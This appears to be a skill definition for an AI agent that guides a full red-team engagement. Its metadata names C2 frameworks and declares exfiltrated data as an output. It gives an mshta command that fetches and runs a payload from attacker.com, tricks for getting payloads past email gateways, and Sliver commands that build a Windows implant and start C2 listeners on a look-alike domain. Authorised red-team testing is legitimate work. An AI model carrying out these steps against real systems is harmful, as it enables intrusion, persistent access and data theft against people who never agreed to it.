| name | red-team-ops |
| description | Use when running a full red-team engagement end-to-end — initial access, persistence, privilege escalation, defense evasion, C2 infrastructure, EDR bypass, living-off-the-land |
| metadata | {"type":"offensive","phase":"post-exploitation","tools":"cobalt-strike, sliver, havoc, mythic, covenant, msfconsole, powershell-empire"} |
| kill_chain | {"phase":["install","actions"],"step":[5,7],"attck_tactics":["TA0003","TA0005","TA0009","TA0010"]} |
| depends_on | ["exploit-development","edr-evasion"] |
| feeds_into | ["threat-hunting","incident-response"] |
| inputs | ["foothold_access","c2_channel"] |
| outputs | ["persistence_mechanism","collected_data","exfiltrated_data"] |
Red Team Operations
When to Activate
- Simulating advanced persistent threat (APT) operations
- Testing detection and response capabilities
- Establishing persistent access and C2
- Evading EDR/AV/SIEM detection
- Privilege escalation on compromised hosts
- Data exfiltration planning
Initial Access
Phishing Payloads
mshta http://attacker.com/payload.hta
Delivery Mechanisms
# Smuggling past email gateways:
# - Password-protected ZIP (password in email body)
# - HTML smuggling (JS constructs blob → downloads file)
# - QR code to attacker-controlled site
# - Legitimate file-sharing (OneDrive, Google Drive links)
Command & Control (C2)
Infrastructure Setup
sliver-server
> generate --mtls attacker.com --os windows --arch amd64 --format exe --save implant.exe
> mtls --lhost 0.0.0.0 --lport 443
> https --lhost 0.0.0.0 --lport 8443 --domain legit-looking.com